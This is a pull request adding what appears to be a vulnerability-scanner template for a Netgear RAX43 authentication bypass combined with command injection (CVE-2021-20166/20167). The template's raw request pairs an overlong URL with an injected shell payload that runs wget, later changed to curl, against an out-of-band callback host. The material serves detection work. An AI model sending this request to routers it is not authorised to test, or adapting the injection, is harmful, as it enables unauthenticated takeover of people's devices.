### PR TITLE
Create CVE-2021-20167.yaml

### DIFF
--- a/cves/2021/CVE-2021-20167.yaml
+++ b/cves/2021/CVE-2021-20167.yaml
@@ -1,0 +1,32 @@
+id: CVE-2021-20167
+
+info:
+  name: Netgear RAX43 - Unauthenticated Command Injection / Authentication Bypass Buffer Overrun via LAN Interface
+  description: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167. Netgear RAX43 version 1.0.3.96 contains a command injection and authbypass vulnerability. The readycloud cgi application is vulnerable to command injection in the name parameter. and The URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the applicaiton.
+  author: gy741
+  severity: critical
+  reference:
+    - https://www.tenable.com/security/research/tra-2021-55
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20166
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20167
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-20167
+    cwe-id: CWE-94
+  tags: cve,cve2021,netgear,rce,router
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
+        Host: {{Hostname}}
+
+        "name":"';$(wget http://{{interactsh-url}});'",
+        "email":"a@b.c"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"

--- a/cves/2021/CVE-2021-20167.yaml
+++ b/cves/2021/CVE-2021-20167.yaml
@@ -2,9 +2,9 @@ id: CVE-2021-20167
 
 info:
   name: Netgear RAX43 - Unauthenticated Command Injection / Authentication Bypass Buffer Overrun via LAN Interface
-  description: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167. Netgear RAX43 version 1.0.3.96 contains a command injection and authbypass vulnerability. The readycloud cgi application is vulnerable to command injection in the name parameter. and The URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the applicaiton.
   author: gy741
   severity: critical
+  description: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167. Netgear RAX43 version 1.0.3.96 contains a command injection and authbypass vulnerability. The readycloud cgi application is vulnerable to command injection in the name parameter. and The URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the applicaiton.
   reference:
     - https://www.tenable.com/security/research/tra-2021-55
     - https://nvd.nist.gov/vuln/detail/CVE-2021-20166
@@ -22,7 +22,7 @@ requests:
         POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
         Host: {{Hostname}}
 
-        "name":"';$(wget http://{{interactsh-url}});'",
+        "name":"';$(curl http://{{interactsh-url}});'",
         "email":"a@b.c"
 
     matchers:


### PR DESCRIPTION
### Template / PR Information

Hello,


Added CVE-2021-20167 and CVE-2021-20166.

This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.
Netgear RAX43 version 1.0.3.96 contains a command injection and authbypass vulnerability. The readycloud cgi application is vulnerable to command injection in the name parameter. and The URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the applicaiton.

- References: https://www.tenable.com/security/research/tra-2021-55


### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO
